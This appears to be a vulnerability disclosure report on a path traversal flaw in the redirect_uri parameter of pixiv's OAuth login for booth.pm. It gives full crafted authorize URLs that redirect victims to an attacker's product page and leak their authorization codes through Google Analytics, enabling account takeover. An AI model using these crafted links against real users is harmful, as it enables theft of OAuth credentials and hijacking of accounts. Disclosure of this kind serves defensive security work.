Path traversal in OAuth redirect_uri
which can lead to users authorization code being leaked to any malicious user.
The following authorization code flow request is generated at booth login.
https://oauth.secure.pixiv.net/v2/auth/authorize?client_id=a1Z7w6JssUQkw5Hid0uIDeuesue9&redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback&response_type=code&scope=read-works+read-favorite-users+read-friends+read-profile+read-email+write-profile&state=%3A1a38b53563599621ce25094661b1c4458ddb52d79d771149
Path traversal vulnerability in this redirect_uri
parameter allows the attacker to direct the user to the product page created by the attacker.
redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback/../../../../ja/items/4503924
-> redirected to https://booth.pm/ja/items/4503924
If the attacker had Google Analytics enabled, the query string could be exposed when the victim is redirected to the product page, so the unused authorization code is leaked.
https://oauth.secure.pixiv.net/v2/auth/authorize?client_id=a1Z7w6JssUQkw5Hid0uIDeuesue9&redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback/../../../../ja/items/[attacker's product id]&response_type=code&scope=read-works+read-favorite-users+read-friends+read-profile+read-email+write-profile&state=%3A1a38b53563599621ce25094661b1c4458ddb52d79d771149
When the victim clicks on the above link and proceeds with the login process, he is redirected to the attackerโs product page.
The attacker can steal victimsโ authorizaiton code from Google Analytics real-time reports.
Due to path traversal in redirect_uri
parameter in OAuth flow, its possible to redirect authenticated users to attackerโs product page with their OAuth credentials from which its possible to takeover their account.